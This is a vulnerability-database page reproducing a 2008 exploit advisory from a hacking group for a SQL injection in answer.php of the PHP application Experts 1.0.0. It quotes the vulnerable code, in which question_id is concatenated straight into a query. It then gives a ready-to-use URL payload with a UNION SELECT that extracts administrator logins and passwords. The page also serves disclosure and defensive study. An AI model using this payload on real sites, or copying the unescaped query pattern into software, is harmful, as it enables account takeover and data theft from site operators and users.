Lucene search

K

Experts (answer.php) Remote SQL Injection Vulnerability

🗓️ 10 Jun 2008 00:00:00Reported by CWH UndergroundType 
zdt
 zdt
🔗 0day.today👁 37 Views

Experts (answer.php) Remote SQL Injection Vulnerability. CWH Underground Hacking Team. Version 1.0.0. SQL Injection Exploit

Show more
Code
=======================================================
Experts (answer.php) Remote SQL Injection Vulnerability
=======================================================



=========================================================
 Experts (answer.php) Remote SQL Injection Vulnerability
=========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 10 June 2008

#####################################################
 APPLICATION : Experts
 VERSION     : 1.0.0
 DOWNLOAD    : http://downloads.sourceforge.net/experts
#####################################################

---SQL Injection Exploit---

***magic_quotes_gpc = off***

##################################################################################
Line:
   67:	$con= "SELECT question_text, question_expert, question_category, question_closed,  
   68:	TIME_TO_SEC(TIMEDIFF(NOW(),question_date)) AS seconds_ago, 
   69:	user_login, user_id, category_name, expert_login   
   70:	FROM question 
   71:	INNER JOIN (user,category, expert) 
   72:	ON (question_user=user_id 
   73:	AND question_category=category_id AND question_expert=expert_id ) 
   74:	WHERE question_id=".$question_id;
   75:	//echo $con."<br>";
   76:	$fai_con=mysql_query($con) or die(mysql_error());
##################################################################################

EXPLOIT:

http://[Target]/[experts_path]/answer.php?question_id=41 AND 1=2 UNION SELECT concat(administrator_login,0x3a,administrator_password),2,3,4,5,6,7,8,9 FROM administrator


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################




#  0day.today [2018-03-14]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
10 Jun 2008 00:00Current
7.1High risk
Vulners AI Score7.1
37
.json
Report